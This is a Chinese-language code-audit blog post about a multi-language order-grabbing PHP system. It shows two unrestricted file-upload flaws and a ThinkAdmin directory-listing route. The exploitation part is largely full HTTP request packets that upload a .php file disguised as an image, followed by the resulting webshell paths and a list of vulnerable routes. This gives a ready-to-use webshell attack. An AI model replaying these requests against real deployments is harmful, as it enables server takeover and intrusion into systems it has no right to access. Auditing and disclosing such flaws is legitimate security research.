请遵守法律法规,合法冲浪
本文仅作知识分享用
一切直接或间接由于本文所造成的后果与本人无关
开发语言:PHP开发框架:ThinkPHP后台地址:/admin/login.html代理登录:/agent/login/index.html
![[代码审计] 某多语言抢单刷单系统](http://cn-sec.com/wp-content/uploads/2024/04/6-1713748530.png "[代码审计] 某多语言抢单刷单系统")
代码解析
任意文件上传No.1
Seay!!!启动!!!
![[代码审计] 某多语言抢单刷单系统](http://cn-sec.com/wp-content/uploads/2024/04/10-1713748531.png "[代码审计] 某多语言抢单刷单系统")
查看源代码
public function upload(){$arr = $_FILES["img"];//var_dump($arr);//加限制条件//1.文件类型//2.文件大小//3.保存的文件名不重复if(($arr["type"]=="image/jpeg" || $arr["type"]=="image/png" ) && $arr["size"]<10241000 ){//临时文件的路径$arr["tmp_name"];//上传的文件存放的位置//避免文件重复://1.加时间戳.time()加用户名.$uid或者加.date('YmdHis')//2.类似网盘,使用文件夹来防止重复$name = '/upload/img/'.date('YmdHis').$arr["name"];$filename = __DIR__ .'/../../../public'.$name;//保存之前判断该文件是否存在if(file_exists($filename)){echo "该文件已存在";}else{//中文名的文件出现问题,所以需要转换编码格式$filename = iconv("UTF-8","gb2312",$filename);//移动临时文件到上传的文件存放的位置(核心代码)//括号里:1.临时文件的路径, 2.存放的路径$a = move_uploaded_file($arr["tmp_name"],$filename);return ['img'=>$name];}}else{echo "上传的文件大小或类型不符";}}
upload仅仅校验了Content-Type与图片大小(小于10241000,此处忽略不计),是可以绕过的。
OK,直接构造上传数据包(注意:1.需要登录普通用户,可以在前台爆破;2.红框部分必须加上),响应包显示上传成功。
![[代码审计] 某多语言抢单刷单系统](http://cn-sec.com/wp-content/uploads/2024/04/10-1713748532.png "[代码审计] 某多语言抢单刷单系统")
访问上传的文件,Ohhhhhh。
![[代码审计] 某多语言抢单刷单系统](http://cn-sec.com/wp-content/uploads/2024/04/4-1713748532.png "[代码审计] 某多语言抢单刷单系统")
任意文件上传No.2
前面的任意文件上传虽然已经可以getshell,但是限制于需要登录普通用户,不够直接,并且Seay没有其他的成果。遂手动查看代码,发现upload.php,代码如下:
public function upload(){$file = request()->file('file');$info = $file->move('uploads');$filename = $info->getSaveName();if ($filename){return ['code'=>1,'data'=>$filename];}else{return ['code'=>0];}}
确实够直接,没有任何限制,直接构造一波数据包,ohhh。
![[代码审计] 某多语言抢单刷单系统](http://cn-sec.com/wp-content/uploads/2024/04/7-1713748533.png "[代码审计] 某多语言抢单刷单系统")
访问上传的webshell,这是🐂🐎们最欢看到的东西Yeah。
![[代码审计] 某多语言抢单刷单系统](http://cn-sec.com/wp-content/uploads/2024/04/2-1713748534.png "[代码审计] 某多语言抢单刷单系统")
列目录(不完全)
这个是Thinkadmin的漏洞(还有一个文件读取漏洞,不知道啥原因,没有复现成功),漏洞效果如下:
![[代码审计] 某多语言抢单刷单系统](http://cn-sec.com/wp-content/uploads/2024/04/10-1713748535.png "[代码审计] 某多语言抢单刷单系统")
漏洞总结
任意文件上传No.1
shell地址:
http://xxx.xxx.xxx/upload/img/20240421215935screen.php漏洞路由:
/sch/recharge/upload/ch/recharge/upload
上传数据包:
POST /ch/recharge/upload HTTP/1.1Host: xxx.xxx.xxxConnection: closeContent-Length: 185Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="116", "Chromium";v="116", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryEBS8wl1vYH9SuABAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9X-Requested-With: XMLHttpRequestCookie: sff93b030=kc66cmqa68guosr5qr917src4l------WebKitFormBoundaryEBS8wl1vYH9SuABAContent-Disposition: form-data; name="img"; filename="screen.php"Content-Type: image/png123------WebKitFormBoundaryEBS8wl1vYH9SuABA--
任意文件上传No.2
shell地址:
http://xxx.xxx.xxx/uploads/20240421/98a4d3ad19cdf8980d6eb0450b120b67.php漏洞路由:
/bx/upload/upload/ch/upload/upload/dg/upload/upload/fg/upload/upload/hl/upload/upload/md/upload/upload/rd/upload/upload/ri/upload/upload/sch/upload/upload/teq/upload/upload/tg/upload/upload/xby/upload/upload/yd/upload/upload/ydl/upload/upload/yn/upload/upload/yue/upload/upload/index/upload/upload
上传数据包:
POST /index/upload/upload HTTP/1.1Host: xxx.xxx.xxxConnection: closeContent-Length: 207Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="116", "Chromium";v="116", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoASMYkoMH51guyUAAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9X-Requested-With: XMLHttpRequestCookie: sff93b030=fgrg4uiq95647pa3e6s90r9n6q------WebKitFormBoundaryoASMYkoMH51guyUAContent-Disposition: form-data; name="file"; filename="screen.php"Content-Type: image/pngphpinfo();------WebKitFormBoundaryoASMYkoMH51guyUA--
列目录(不完全)
/admin.html?s=admin/api.Update/tree![[代码审计] 某多语言抢单刷单系统](http://cn-sec.com/wp-content/uploads/2024/04/0-1713748536.gif "[代码审计] 某多语言抢单刷单系统")
原文始发于微信公众号(不够安全):[代码审计] 某多语言抢单刷单系统
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论